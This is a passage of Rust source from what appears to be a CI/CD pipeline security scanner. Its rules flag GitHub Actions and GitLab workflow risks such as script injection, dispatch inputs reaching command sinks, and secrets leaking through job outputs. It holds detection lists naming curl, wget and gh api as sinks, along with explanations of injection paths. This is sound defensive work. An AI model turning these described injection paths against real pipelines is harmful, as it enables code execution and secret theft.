3591    // GHA council Bucket 1 rules
3592    findings.extend(risky_trigger_with_authority(graph));
3593    findings.extend(sensitive_value_in_job_output(graph));
3594    findings.extend(manual_dispatch_input_to_url_or_command(graph));
3595    // GHA council Bucket 2 rules
3596    findings.extend(secrets_inherit_overscoped_passthrough(graph));
3597    findings.extend(unsafe_pr_artifact_in_workflow_run_consumer(graph));
3598    // GHA council Bucket 3 rules
3599    findings.extend(script_injection_via_untrusted_context(graph));
3600    findings.extend(interactive_debug_action_in_authority_workflow(graph));
3601    findings.extend(pr_specific_cache_key_in_default_branch_consumer(graph));
3602    findings.extend(gh_cli_with_default_token_escalating(graph));
3603    // GitLab council Bucket A rules
3604    findings.extend(ci_job_token_to_external_api(graph));
3605    findings.extend(id_token_audience_overscoped(graph));
3606    findings.extend(untrusted_ci_var_in_shell_interpolation(graph));
3607    // GitLab council Bucket B+C rules
3608    findings.extend(unpinned_include_remote_or_branch_ref(graph));
3609    findings.extend(dind_service_grants_host_authority(graph));
3610    findings.extend(security_job_silently_skipped(graph));
3611    findings.extend(child_pipeline_trigger_inherits_authority(graph));
3612    findings.extend(cache_key_crosses_trust_boundary(graph));
3613    // GitLab red-team Group D rules
3614    findings.extend(pat_embedded_in_git_remote_url(graph));
3615    findings.extend(ci_token_triggers_downstream_with_variable_passthrough(
3616        graph,
3617    ));
3618    findings.extend(dotenv_artifact_flows_to_privileged_deployment(graph));
3619
3620    // Deduplicate structurally identical findings BEFORE compensating controls.
3621    // Order matters: compensating controls append to finding messages (e.g.
3622    // " [compensating control: ...]"), so deduping after them would fail to
3623    // collapse two BFS-duplicate findings where one CC-modified and the other
3624    // did not. Key on (category, nodes_involved, message) so distinct
3625    // per-variable findings on the same step are preserved.
3626    let mut seen_keys: std::collections::HashSet<(FindingCategory, Vec<NodeId>, String)> =
3627        std::collections::HashSet::new();
3628    findings
3629        .retain(|f| seen_keys.insert((f.category, f.nodes_involved.clone(), f.message.clone())));
3630
3631    // Blue-team compensating-control suppressions (downgrade or suppress
3632    // existing-rule findings when a control elsewhere in the graph
3633    // neutralises the risk). Applied after dedup so each unique finding
3634    // gets exactly one CC evaluation.
3635    apply_compensating_controls(graph, &mut findings);
3636
3637    findings.sort_by_key(|f| f.severity);
3638
3639    findings
3640}
3641
3642// ── R3: risky_trigger_with_authority ────────────────────
3643// `issue_comment`, `pull_request_review`, `pull_request_review_comment`, and
3644// `workflow_run` are high-blast-radius triggers — anyone able to comment on
3645// an issue (or any contributor whose previous workflow run completed) can
3646// fire the workflow with secrets in scope. `trigger_context_mismatch` only
3647// fires on `pull_request_target` / ADO `pr`, so this rule closes the gap.
3648
3649/// Trigger names that confer the same effective blast radius as
3650/// `pull_request_target` once they're paired with write permissions or
3651/// non-`GITHUB_TOKEN` secrets. Order is alphabetical for stable output.
3652const RISKY_TRIGGERS: &[&str] = &[
3653    "issue_comment",
3654    "pull_request_review",
3655    "pull_request_review_comment",
3656    "workflow_run",
3657];
3658
3659/// Returns true if the permissions string declares any GitHub Actions
3660/// write-grant scope (`*: write`) or `write-all`. Conservatively flags
3661/// any unscoped `write-all`. The check looks for `: write` substrings so
3662/// it catches `contents: write`, `pull-requests: write`, `id-token: write`,
3663/// etc., regardless of how `Permissions::Map` formats the surrounding map.
3664fn permissions_grant_writes(perm_string: &str) -> bool {
3665    let p = perm_string.to_lowercase();
3666    p.contains("write-all") || p.contains(": write")
3667}
3668
3669/// Rule: high-blast-radius trigger (`issue_comment`,
3670/// `pull_request_review[_comment]`, `workflow_run`) declared alongside
3671/// write-grant permissions or any non-`GITHUB_TOKEN` secret.
3672///
3673/// Detection (deterministic, no path traversal):
3674/// 1. Read `META_TRIGGERS` (graph metadata) — comma-joined list of every
3675///    trigger declared under `on:`.
3676/// 2. Filter for entries in `RISKY_TRIGGERS`.
3677/// 3. Inspect every Identity node carrying `META_PERMISSIONS` — if any
3678///    grants `: write` or `write-all`, the workflow holds write authority.
3679/// 4. Scan all Secret nodes; any whose name is not literally `GITHUB_TOKEN`
3680///    counts as a non-default secret in scope.
3681/// 5. Fire one finding per workflow when steps 1–2 match AND (3 OR 4).
3682///
3683/// Severity: High. The blast radius matches `pull_request_target` but the
3684/// trigger surface is broader (anyone with comment access vs. only PR
3685/// authors), so this rule never downgrades by trigger type.
3686pub fn risky_trigger_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
3687    let triggers_meta = match graph.metadata.get(META_TRIGGERS) {
3688        Some(t) => t,
3689        None => return Vec::new(),
3690    };
3691
3692    let risky_present: Vec<&str> = triggers_meta
3693        .split(',')
3694        .map(str::trim)
3695        .filter(|t| RISKY_TRIGGERS.iter().any(|r| r == t))
3696        .collect();
3697
3698    if risky_present.is_empty() {
3699        return Vec::new();
3700    }
3701
3702    // (3) Any Identity node with write permissions?
3703    let mut writes_identities: Vec<NodeId> = Vec::new();
3704    for ident in graph.nodes_of_kind(NodeKind::Identity) {
3705        if let Some(perms) = ident.metadata.get(META_PERMISSIONS) {
3706            if permissions_grant_writes(perms) {
3707                writes_identities.push(ident.id);
3708            }
3709        }
3710    }
3711
3712    // (4) Any non-GITHUB_TOKEN secret in scope?
3713    let non_default_secrets: Vec<NodeId> = graph
3714        .nodes_of_kind(NodeKind::Secret)
3715        .filter(|s| s.name != "GITHUB_TOKEN")
3716        .map(|s| s.id)
3717        .collect();
3718
3719    if writes_identities.is_empty() && non_default_secrets.is_empty() {
3720        return Vec::new();
3721    }
3722
3723    let trigger_label = risky_present.join(", ");
3724    let cause = if !writes_identities.is_empty() && !non_default_secrets.is_empty() {
3725        format!(
3726            "{} write-grant identit{} and {} non-default secret{}",
3727            writes_identities.len(),
3728            if writes_identities.len() == 1 {
3729                "y"
3730            } else {
3731                "ies"
3732            },
3733            non_default_secrets.len(),
3734            if non_default_secrets.len() == 1 {
3735                ""
3736            } else {
3737                "s"
3738            },
3739        )
3740    } else if !writes_identities.is_empty() {
3741        format!(
3742            "{} write-grant identit{}",
3743            writes_identities.len(),
3744            if writes_identities.len() == 1 {
3745                "y"
3746            } else {
3747                "ies"
3748            },
3749        )
3750    } else {
3751        format!(
3752            "{} non-default secret{}",
3753            non_default_secrets.len(),
3754            if non_default_secrets.len() == 1 {
3755                ""
3756            } else {
3757                "s"
3758            },
3759        )
3760    };
3761
3762    let mut nodes_involved = writes_identities.clone();
3763    nodes_involved.extend(non_default_secrets);
3764
3765    vec![Finding {
3766        severity: Severity::High,
3767        category: FindingCategory::RiskyTriggerWithAuthority,
3768        path: None,
3769        nodes_involved,
3770        message: format!(
3771            "Workflow trigger(s) [{trigger_label}] grant the same blast radius as pull_request_target but slip past trigger_context_mismatch — {cause} are reachable from any commenter / upstream-run author"
3772        ),
3773        recommendation: Recommendation::Manual {
3774            action: "Drop write-grant permissions to the minimum the trigger requires (most labelers/triagers only need `pull-requests: write` or `issues: write`), or split the workflow: keep the comment-triggered handler authority-free and gate privileged work behind a separate workflow that an authorized user must dispatch manually.".into(),
3775        },
3776        source: FindingSource::BuiltIn,
3777        extras: FindingExtras::default(),
3778    }]
3779}
3780
3781// ── R4: sensitive_value_in_job_output ───────────────────
3782// `jobs.<id>.outputs.<name>` is written to the run log (only the heuristic
3783// mask protects it) and propagates unmasked via `needs.<job>.outputs.*`.
3784// Sourcing an output from `secrets.*`, an OIDC-bearing step output, or
3785// giving it a credential-shaped name is a structural leak.
3786
3787/// Suffixes that mark a job-output name as credential-shaped. Matched
3788/// case-insensitively against the trailing segment of the output name.
3789const CREDENTIAL_NAME_SUFFIXES: &[&str] = &[
3790    "_token",
3791    "_secret",
3792    "_key",
3793    "_pem",
3794    "_password",
3795    "_credential",
3796    "_credentials",
3797    "_api_key",
3798];
3799
3800/// Returns true if `name` ends with any of `CREDENTIAL_NAME_SUFFIXES`,
3801/// matched case-insensitively.
3802fn output_name_is_credential_shaped(name: &str) -> bool {
3803    let lower = name.to_lowercase();
3804    CREDENTIAL_NAME_SUFFIXES.iter().any(|s| lower.ends_with(s))
3805}
3806
3807/// Rule: a `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
3808/// OIDC-bearing step output, or has a credential-shaped name (suffix
3809/// matches `_token` / `_secret` / `_key` / `_pem` / `_password` /
3810/// `_credential[s]` / `_api_key`).
3811///
3812/// Detection: read `META_JOB_OUTPUTS` (graph metadata) — pipe-delimited
3813/// records of `<job>\t<name>\t<source>`. For each record, fire a finding
3814/// when `source != "literal"` OR `name` matches a credential suffix.
3815///
3816/// Severity:
3817/// - **Critical** when `source == "secret"` (raw `secrets.*` value).
3818/// - **Critical** when `source == "oidc"` (OIDC token leaked via output).
3819/// - **High** when `source == "step_output"` AND name is credential-shaped.
3820/// - **High** when `source == "literal"` AND name is credential-shaped
3821///   (developer is signaling credential intent in the API).
3822/// - Otherwise no finding.
3823pub fn sensitive_value_in_job_output(graph: &AuthorityGraph) -> Vec<Finding> {
3824    let raw = match graph.metadata.get(META_JOB_OUTPUTS) {
3825        Some(s) if !s.is_empty() => s,
3826        _ => return Vec::new(),
3827    };
3828
3829    let mut findings = Vec::new();
3830
3831    for record in raw.split('|') {
3832        // Format: "<job>\t<name>\t<source>"
3833        let mut fields = record.splitn(3, '\t');
3834        let job = match fields.next() {
3835            Some(j) if !j.is_empty() => j,
3836            _ => continue,
3837        };
3838        let name = match fields.next() {
3839            Some(n) if !n.is_empty() => n,
3840            _ => continue,
3841        };
3842        let source = fields.next().unwrap_or("literal");
3843
3844        let credential_named = output_name_is_credential_shaped(name);
3845
3846        let (severity, reason) = match source {
3847            "secret" => (
3848                Severity::Critical,
3849                "value reads `secrets.*` directly — exfiltrated to run log and to every downstream `needs.*.outputs.*` consumer",
3850            ),
3851            "oidc" => (
3852                Severity::Critical,
3853                "value derives from a step that holds an OIDC identity — the federated token leaks through the output channel",
3854            ),
3855            "step_output" if credential_named => (
3856                Severity::High,
3857                "credential-shaped output name backed by a step output — masking is heuristic, downstream consumers see plaintext",
3858            ),
3859            "literal" if credential_named => (
3860                Severity::High,
3861                "credential-shaped output name with a literal value — either the value is a hard-coded secret or the contract leaks credentials to downstream jobs",
3862            ),
3863            _ => continue,
3864        };
3865
3866        findings.push(Finding {
3867            severity,
3868            category: FindingCategory::SensitiveValueInJobOutput,
3869            path: None,
3870            nodes_involved: Vec::new(),
3871            message: format!(
3872                "Job '{job}' declares output '{name}' — {reason}"
3873            ),
3874            recommendation: Recommendation::Manual {
3875                action: "Do not expose secrets, OIDC tokens, or credential-shaped values via `jobs.<id>.outputs.*`. Pass them between steps within a single job using `env:` (which honors masking) or write them to a secure file consumed only by a downstream step. If a downstream job needs to act on a credential, fetch it directly from the secret store inside that job instead of inheriting it through outputs.".into(),
3876            },
3877            source: FindingSource::BuiltIn,
3878            extras: FindingExtras::default(),
3879        });
3880    }
3881
3882    findings
3883}
3884
3885// ── R6: manual_dispatch_input_to_url_or_command ────────
3886// `workflow_dispatch.inputs.*` is attacker-controlled in any repository
3887// where collaborators have `Actions: write`. Flowing an input value into
3888// `curl` / `wget` / `gh api` / a `run:` URL / `actions/checkout` `ref:`
3889// gives the dispatcher arbitrary code execution against the runner — a
3890// pivot from "can run a workflow" to "can land arbitrary code on a
3891// privileged runner".
3892
3893/// Tokens that indicate command-line consumption of an input value when
3894/// they appear in the same `run:` body as the input expression. Each token
3895/// must be matched whole-word so we don't false-positive on `curlier` etc.
3896const COMMAND_SINKS: &[&str] = &[
3897    "curl",
3898    "wget",
3899    "gh api",
3900    "gh release",
3901    "gh secret",
3902    "gh repo",
3903    "git clone",
3904    "git fetch",
3905];
3906
3907/// Returns true if `body` contains a whole-word occurrence of `needle`.
3908/// "Whole word" = preceded by start-of-string or non-alphanumeric, and
3909/// followed by end-of-string or non-alphanumeric. Avoids matching
3910/// `curl` inside `curlier` or `git fetch` inside `git fetcher`.
3911fn body_contains_command(body: &str, needle: &str) -> bool {
3912    let mut start = 0;
3913    while let Some(rel) = body[start..].find(needle) {
3914        let abs = start + rel;
3915        let before_ok = abs == 0
3916            || !body
3917                .as_bytes()
3918                .get(abs - 1)
3919                .map(|b| b.is_ascii_alphanumeric() || *b == b'_')
3920                .unwrap_or(false);
3921        let after_idx = abs + needle.len();
3922        let after_ok = after_idx == body.len()
3923            || !body
3924                .as_bytes()
3925                .get(after_idx)
3926                .map(|b| b.is_ascii_alphanumeric() || *b == b'_')
3927                .unwrap_or(false);
3928        if before_ok && after_ok {
3929            return true;
3930        }
3931        start = abs + needle.len();
3932    }
3933    false
3934}
3935
3936/// Returns true if `body` references the dispatch input `name` via either
3937/// `${{ inputs.<name> }}` or `${{ github.event.inputs.<name> }}`. Tolerates
3938/// any whitespace inside the `${{ … }}` expression.
3939fn body_references_input(body: &str, name: &str) -> bool {
3940    // Substring forms — GHA accepts both `inputs.X` and `github.event.inputs.X`.
3941    let needle_a = format!("inputs.{name}");
3942    let needle_b = format!("github.event.inputs.{name}");
3943    body.contains(&needle_a) || body.contains(&needle_b)
3944}
3945
3946/// Rule: a `workflow_dispatch.inputs.*` value flows into a command sink
3947/// (`curl`, `wget`, `gh api`, `git clone`, …) or `actions/checkout`
3948/// `with.ref:`.
3949///
3950/// Detection:
3951/// 1. Read `META_DISPATCH_INPUTS` — comma-joined list of input names.
3952/// 2. For every Step node carrying `META_SCRIPT_BODY`, fire a finding when
3953///    the body references any input name AND contains a whole-word
3954///    occurrence of any `COMMAND_SINKS` entry.
3955/// 3. For every Step node carrying `META_CHECKOUT_REF`, fire a finding when
3956///    the ref expression references any input name (the ref is consumed by
3957///    `actions/checkout`, which performs `git fetch` / `git checkout`
3958///    against the supplied ref).
3959///
3960/// Severity: High. Dispatch is a privileged operation, but the privileged
3961/// surface is bounded to whoever holds `Actions: write` on the repo —
3962/// narrower than `pull_request_target`, broader than a maintainer-only
3963/// secret.
3964pub fn manual_dispatch_input_to_url_or_command(graph: &AuthorityGraph) -> Vec<Finding> {
3965    let inputs_meta = match graph.metadata.get(META_DISPATCH_INPUTS) {
3966        Some(s) if !s.is_empty() => s,
3967        _ => return Vec::new(),
3968    };
3969
3970    let inputs: Vec<&str> = inputs_meta
3971        .split(',')
3972        .map(str::trim)
3973        .filter(|s| !s.is_empty())
3974        .collect();
3975    if inputs.is_empty() {
3976        return Vec::new();
3977    }
3978
3979    let mut findings = Vec::new();
3980
3981    for step in graph.nodes_of_kind(NodeKind::Step) {
3982        // (a) Script body sink
3983        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
3984            let referenced: Vec<&str> = inputs
3985                .iter()
3986                .copied()
3987                .filter(|name| body_references_input(body, name))
3988                .collect();
3989            if !referenced.is_empty() {
3990                let sinks: Vec<&str> = COMMAND_SINKS
3991                    .iter()
3992                    .copied()
3993                    .filter(|s| body_contains_command(body, s))
3994                    .collect();
3995                if !sinks.is_empty() {
3996                    findings.push(Finding {
3997                        severity: Severity::High,
3998                        category: FindingCategory::ManualDispatchInputToUrlOrCommand,
3999                        path: None,
4000                        nodes_involved: vec![step.id],
4001                        message: format!(
4002                            "Step '{}' interpolates workflow_dispatch input(s) [{}] into command sink(s) [{}] — anyone with Actions:write can pivot the run to attacker-controlled hosts/refs",
4003                            step.name,
4004                            referenced.join(", "),
4005                            sinks.join(", "),
4006                        ),
4007                        recommendation: Recommendation::Manual {
4008                            action: "Pass the input through the step's `env:` block (where the runtime quotes it) and reference `\"$INPUT_NAME\"` in the script. For URLs, validate against an allowlist before fetching. Never let a dispatch input land in a `git clone` / `actions/checkout` ref without an explicit allowlist of permitted refs.".into(),
4009                        },
4010                        source: FindingSource::BuiltIn,
4011                        extras: FindingExtras::default(),
4012                    });
4013                }
4014            }
4015        }
4016
4017        // (b) actions/checkout ref sink
4018        if let Some(ref_expr) = step.metadata.get(META_CHECKOUT_REF) {
4019            let referenced: Vec<&str> = inputs
4020                .iter()
4021                .copied()
4022                .filter(|name| body_references_input(ref_expr, name))
4023                .collect();
4024            if !referenced.is_empty() {
4025                findings.push(Finding {
4026                    severity: Severity::High,
4027                    category: FindingCategory::ManualDispatchInputToUrlOrCommand,
4028                    path: None,
4029                    nodes_involved: vec![step.id],
4030                    message: format!(
4031                        "Step '{}' uses workflow_dispatch input(s) [{}] as the actions/checkout ref — the dispatcher chooses which commit lands on the privileged runner",
4032                        step.name,
4033                        referenced.join(", "),
4034                    ),
4035                    recommendation: Recommendation::Manual {
4036                        action: "Constrain the dispatch input via a `type: choice` `options:` allowlist of permitted refs/branches, or hard-code the ref and accept a different parameter (e.g. release tag) that maps onto a vetted ref.".into(),
4037                    },
4038                    source: FindingSource::BuiltIn,
4039                    extras: FindingExtras::default(),
4040                });
4041            }
4042        }
4043    }
4044
4045    findings
4046}
4047/// Set of trigger names whose runs are influenced by parties outside the
4048/// repo's write-permission set — anything that can be initiated by opening a
4049/// PR, commenting on an issue, or reacting to another workflow's outcome.
4050/// Used by `secrets_inherit_overscoped_passthrough` and
4051/// `unsafe_pr_artifact_in_workflow_run_consumer` to gate detection.
4052const RISKY_TRIGGER_NAMES: &[&str] = &[
4053    "pull_request",
4054    "pull_request_target",
4055    "pull_request_review",
4056    "pull_request_review_comment",
4057    "issue_comment",
4058    "workflow_run",
4059];
4060
4061/// Returns true if any trigger name in the comma-joined `META_TRIGGERS` list
4062/// matches a risky trigger.
4063fn graph_has_risky_trigger(graph: &AuthorityGraph) -> bool {
4064    let Some(triggers) = graph.metadata.get(META_TRIGGERS) else {
4065        return false;
4066    };
4067    triggers
4068        .split(',')
4069        .any(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4070}
4071
4072/// Returns the first risky trigger name present on the graph, for messaging.
4073fn first_risky_trigger(graph: &AuthorityGraph) -> Option<String> {
4074    let triggers = graph.metadata.get(META_TRIGGERS)?;
4075    triggers
4076        .split(',')
4077        .find(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4078        .map(|s| s.trim().to_string())
4079}
4080
4081/// Rule: reusable workflow call uses `secrets: inherit` under a risky trigger.
4082///
4083/// Fires once per Step node carrying `META_SECRETS_INHERIT = "true"` when the
4084/// graph's `META_TRIGGERS` set contains at least one attacker-influenced
4085/// trigger (`pull_request`, `pull_request_target`, `issue_comment`,
4086/// `workflow_run`, `pull_request_review`, `pull_request_review_comment`).
4087///
4088/// `secrets: inherit` forwards the entire caller secret bag to the callee
4089/// regardless of which secrets the callee actually consumes. Combined with a
4090/// trigger an external party can fire, every secret in scope is one
4091/// compromised callee away from exfiltration.
4092pub fn secrets_inherit_overscoped_passthrough(graph: &AuthorityGraph) -> Vec<Finding> {
4093    if !graph_has_risky_trigger(graph) {
4094        return Vec::new();
4095    }
4096    let trigger = first_risky_trigger(graph).unwrap_or_else(|| "risky".into());
4097
4098    let mut findings = Vec::new();
4099    for step in graph.nodes_of_kind(NodeKind::Step) {
4100        let inherits = step
4101            .metadata
4102            .get(META_SECRETS_INHERIT)
4103            .map(|v| v == "true")
4104            .unwrap_or(false);
4105        if !inherits {
4106            continue;
4107        }
4108
4109        // Find the reusable workflow target the step delegates to (if any) so
4110        // the message can name the callee.
4111        let target_name = graph
4112            .edges_from(step.id)
4113            .filter(|e| e.kind == EdgeKind::DelegatesTo)
4114            .filter_map(|e| graph.node(e.to))
4115            .find(|n| n.kind == NodeKind::Image)
4116            .map(|n| n.name.clone())
4117            .unwrap_or_else(|| "<unknown>".into());
4118
4119        findings.push(Finding {
4120            severity: Severity::High,
4121            category: FindingCategory::SecretsInheritOverscopedPassthrough,
4122            path: None,
4123            nodes_involved: vec![step.id],
4124            message: format!(
4125                "Job '{}' calls reusable workflow '{}' with `secrets: inherit` while the workflow is triggered by '{}' — every caller secret forwards to the callee regardless of need",
4126                step.name, target_name, trigger
4127            ),
4128            recommendation: Recommendation::Manual {
4129                action: "Replace `secrets: inherit` with an explicit `secrets:` mapping listing only the secrets the callee actually consumes. For PR/comment/workflow_run-triggered callers, audit the callee for log exposure of every forwarded secret.".into(),
4130            },
4131            source: FindingSource::BuiltIn,
4132            extras: FindingExtras::default(),
4133        });
4134    }
4135
4136    findings
4137}
4138
4139/// Rule: `workflow_run`/`pull_request_target` consumer downloads a PR-context
4140/// artifact AND interprets its content into a privileged sink.
4141///
4142/// Requires:
4143/// 1. Graph trigger is `workflow_run` or `pull_request_target` (the producer
4144///    ran in PR context, so the artifact is attacker-controlled).
4145/// 2. At least one Step in a job carries `META_DOWNLOADS_ARTIFACT = "true"`.
4146/// 3. At least one Step in the *same job* carries
4147///    `META_INTERPRETS_ARTIFACT = "true"` (post-to-comment, write to
4148///    `$GITHUB_ENV`, `eval`, `unzip`, `cat`, `jq`, …).
4149///
4150/// Differs from `artifact_boundary_crossing`: that rule flags upload→download
4151/// trust crossings on Artifact nodes; this rule additionally requires the
4152/// consumer interprets the downloaded content.
4153pub fn unsafe_pr_artifact_in_workflow_run_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4154    // Trigger gate: workflow_run consumers and pull_request_target both run
4155    // in upstream-repo context with elevated permissions while the artifact
4156    // (or PR head ref) originates from PR context.
4157    let triggers_ok = {
4158        let single = graph
4159            .metadata
4160            .get(META_TRIGGER)
4161            .map(|s| s == "workflow_run" || s == "pull_request_target")
4162            .unwrap_or(false);
4163        let multi = graph
4164            .metadata
4165            .get(META_TRIGGERS)
4166            .map(|s| {
4167                s.split(',')
4168                    .any(|t| t.trim() == "workflow_run" || t.trim() == "pull_request_target")
4169            })
4170            .unwrap_or(false);
4171        single || multi
4172    };
4173    if !triggers_ok {
4174        return Vec::new();
4175    }
4176
4177    // Group steps by job name so we can pair download + interpret within a job.
4178    use std::collections::BTreeMap;
4179    let mut by_job: BTreeMap<String, (Vec<NodeId>, Vec<NodeId>)> = BTreeMap::new();
4180    for step in graph.nodes_of_kind(NodeKind::Step) {
4181        let job = step
4182            .metadata
4183            .get(META_JOB_NAME)
4184            .cloned()
4185            .unwrap_or_default();
4186        let entry = by_job.entry(job).or_default();
4187        if step
4188            .metadata
4189            .get(META_DOWNLOADS_ARTIFACT)
4190            .map(|v| v == "true")
4191            .unwrap_or(false)
4192        {
4193            entry.0.push(step.id);
4194        }
4195        if step
4196            .metadata
4197            .get(META_INTERPRETS_ARTIFACT)
4198            .map(|v| v == "true")
4199            .unwrap_or(false)
4200        {
4201            entry.1.push(step.id);
4202        }
4203    }
4204
4205    let mut findings = Vec::new();
4206    for (job, (downloaders, interpreters)) in by_job {
4207        if downloaders.is_empty() || interpreters.is_empty() {
4208            continue;
4209        }
4210        let mut nodes_involved = downloaders.clone();
4211        nodes_involved.extend(interpreters.iter().copied());
4212
4213        let job_label = if job.is_empty() {
4214            "<workflow-level>".to_string()
4215        } else {
4216            job
4217        };
4218
4219        findings.push(Finding {
4220            severity: Severity::High,
4221            category: FindingCategory::UnsafePrArtifactInWorkflowRunConsumer,
4222            path: None,
4223            nodes_involved,
4224            message: format!(
4225                "Job '{}' downloads a PR-context artifact and interprets its content (post-to-comment, $GITHUB_ENV write, eval/unzip/cat/jq) — malicious PRs can write arbitrary content into the artifact while the consumer runs with upstream-repo authority",
4226                job_label
4227            ),
4228            recommendation: Recommendation::Manual {
4229                action: "Treat downloaded artifacts as untrusted: validate against a strict schema before parsing, never feed contents into `eval`/`$GITHUB_ENV`/`$GITHUB_OUTPUT`, and post comment bodies through a length-and-character-allowlist filter. Where possible, separate the privileged-sink step into its own job that does not download the artifact.".into(),
4230            },
4231            source: FindingSource::BuiltIn,
4232            extras: FindingExtras::default(),
4233        });
4234    }
4235
4236    findings
4237}
4238
4239// ── GHA security rules from corpus gap analysis ─────────────────────────
4240//
4241// Source: MEMORY/WORK/20260425-230443_taudit-gitlab-parser/corpus-results/council-gha-gaps.md
4242// Rules R1, R5, R9, R10. All four read META_SCRIPT_BODY (R1, R10) or
4243// step-level metadata stamped by the GHA parser (R5, R9). They gate on
4244// META_TRIGGERS where a specific trigger surface is required.
4245
4246/// Returns true if `triggers_csv` (the comma-separated value of META_TRIGGERS
4247/// stamped by the GHA parser) contains any of `wanted`. Tolerant of
4248/// whitespace and empty entries.
4249fn triggers_contain_any(triggers_csv: Option<&String>, wanted: &[&str]) -> bool {
4250    let Some(csv) = triggers_csv else {
4251        return false;
4252    };
4253    csv.split(',')
4254        .map(|s| s.trim())
4255        .any(|t| wanted.contains(&t))
4256}
4257
4258/// Substring locations of every `${{ ... }}` expression inside `body`. Returns
4259/// the inner trimmed expression text plus the byte range so callers can attach
4260/// surrounding-context heuristics. Doesn't try to handle nested `}}` — none of
4261/// the patterns we care about contain it.
4262fn find_template_expressions(body: &str) -> Vec<(String, std::ops::Range<usize>)> {
4263    let mut out = Vec::new();
4264    let mut cursor = 0usize;
4265    while let Some(rel_open) = body[cursor..].find("${{") {
4266        let open = cursor + rel_open;
4267        let inner_start = open + 3;
4268        let Some(rel_close) = body[inner_start..].find("}}") else {
4269            break;
4270        };
4271        let close = inner_start + rel_close;
4272        let expr = body[inner_start..close].trim().to_string();
4273        out.push((expr, open..close + 2));
4274        cursor = close + 2;
4275    }
4276    out
4277}
4278
4279/// Patterns that mark an attacker-controllable expression for R1.
4280/// Order matters only for documentation — detection is OR.
4281fn is_untrusted_context_expression(expr: &str) -> bool {
4282    // Strip leading/trailing whitespace already done by caller.
4283    // Examples: `github.event.issue.title`, `github.event.pull_request.body`,
4284    // `github.event.comment.body`, `github.event.review.body`,
4285    // `github.head_ref`, `inputs.target_branch`.
4286    if expr.starts_with("github.event.issue.")
4287        || expr.starts_with("github.event.pull_request.")
4288        || expr.starts_with("github.event.comment.")
4289        || expr.starts_with("github.event.review.")
4290        || expr.starts_with("github.event.discussion.")
4291        || expr.starts_with("github.event.workflow_run.")
4292        || expr.starts_with("github.event.inputs.")
4293    {
4294        return true;
4295    }
4296    if expr == "github.head_ref" || expr.starts_with("github.head_ref ") {
4297        return true;
4298    }
4299    // `inputs.X` is attacker-influenced under workflow_dispatch / workflow_run
4300    // / issue_comment-driven inputs. The rule's caller gates on the trigger
4301    // surface, so any `inputs.*` here is suspect.
4302    if let Some(rest) = expr.strip_prefix("inputs.") {
4303        if !rest.is_empty() {
4304            return true;
4305        }
4306    }
4307    false
4308}
4309
4310/// Returns true when an expression's value lands in a script sink that
4311/// matters for R1 — shell text, JS source, or a write to GITHUB_ENV /
4312/// GITHUB_OUTPUT. Heuristic: the expression is **not** the right-hand side of
4313/// a YAML `env:` mapping. The parser already separates step-level `env:`
4314/// mappings into the secret/auth machinery, so any expression appearing inside
4315/// the script body itself bypasses the env-indirection mitigation by
4316/// definition.
4317fn is_script_injection_sink(_body: &str, _range: &std::ops::Range<usize>) -> bool {
4318    // Every occurrence inside META_SCRIPT_BODY qualifies — the body is the
4319    // shell/JS source itself. (Step-level `env:` values are stored on the
4320    // edges, not in the body.) Kept as a function so the doc string spells
4321    // the rationale and future heuristics have a clear hook.
4322    true
4323}
4324
4325/// R1 — script injection via untrusted context.
4326///
4327/// Severity: Critical. Classic GitHub Actions remote code execution: an
4328/// expression that an external actor controls (`github.event.issue.title`,
4329/// `github.head_ref`, `github.event.inputs.*` under `workflow_dispatch`)
4330/// gets concatenated into the shell command (or JS source for
4331/// `actions/github-script`) at YAML-render time, before any quoting or
4332/// escaping the runtime would apply to env-bound values.
4333pub fn script_injection_via_untrusted_context(graph: &AuthorityGraph) -> Vec<Finding> {
4334    let mut findings = Vec::new();
4335
4336    for step in graph.nodes_of_kind(NodeKind::Step) {
4337        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4338            continue;
4339        };
4340        if body.is_empty() {
4341            continue;
4342        }
4343
4344        let mut hits: Vec<String> = Vec::new();
4345        for (expr, range) in find_template_expressions(body) {
4346            if !is_untrusted_context_expression(&expr) {
4347                continue;
4348            }
4349            if !is_script_injection_sink(body, &range) {
4350                continue;
4351            }
4352            if !hits.contains(&expr) {
4353                hits.push(expr);
4354            }
4355        }
4356
4357        if hits.is_empty() {
4358            continue;
4359        }
4360
4361        // Cap preview to keep the message readable even when a step has many
4362        // distinct attacker-controlled interpolations.
4363        let preview: String = hits
4364            .iter()
4365            .take(3)
4366            .map(|s| format!("${{{{ {s} }}}}"))
4367            .collect::<Vec<_>>()
4368            .join(", ");
4369        let suffix = if hits.len() > 3 {
4370            format!(", and {} more", hits.len() - 3)
4371        } else {
4372            String::new()
4373        };
4374
4375        findings.push(Finding {
4376            severity: Severity::Critical,
4377            category: FindingCategory::ScriptInjectionViaUntrustedContext,
4378            path: None,
4379            nodes_involved: vec![step.id],
4380            message: format!(
4381                "Step '{}' interpolates attacker-controlled expression(s) {preview}{suffix} directly into a script body without an env: indirection — classic GitHub Actions RCE",
4382                step.name
4383            ),
4384            recommendation: Recommendation::Manual {
4385                action: "Bind the expression to a step-level `env:` variable and reference it as `\"$VAR\"` (shell) or `process.env.VAR` (JS). The runtime then quotes the value as data instead of YAML-rendering it as code.".into(),
4386            },
4387            source: FindingSource::BuiltIn,
4388            extras: FindingExtras::default(),
4389        });
4390    }
4391
4392    findings
4393}
4394
4395/// R5 — interactive debug action in an authority workflow.
4396///
4397/// Severity: High. A successful tmate / upterm session opens an external SSH
4398/// endpoint into the runner with the full job environment loaded — every
4399/// secret in scope, the checked-out HEAD, and write access to whatever the
4400/// GITHUB_TOKEN holds. Anyone who can flip `debug_enabled=true` at job start
4401/// (often a maintainer with `workflow_dispatch` permission) can launder the
4402/// job's authority off the runner.
4403pub fn interactive_debug_action_in_authority_workflow(graph: &AuthorityGraph) -> Vec<Finding> {
4404    let mut findings = Vec::new();
4405
4406    // Pre-compute whether the workflow holds non-default authority.
4407    // Two ways to qualify:
4408    //  (a) any step has access to a non-GITHUB_TOKEN Secret or Identity, OR
4409    //  (b) any GITHUB_TOKEN identity has a non-default write permission.
4410    let workflow_has_extra_secrets = graph.authority_sources().any(|n| match n.kind {
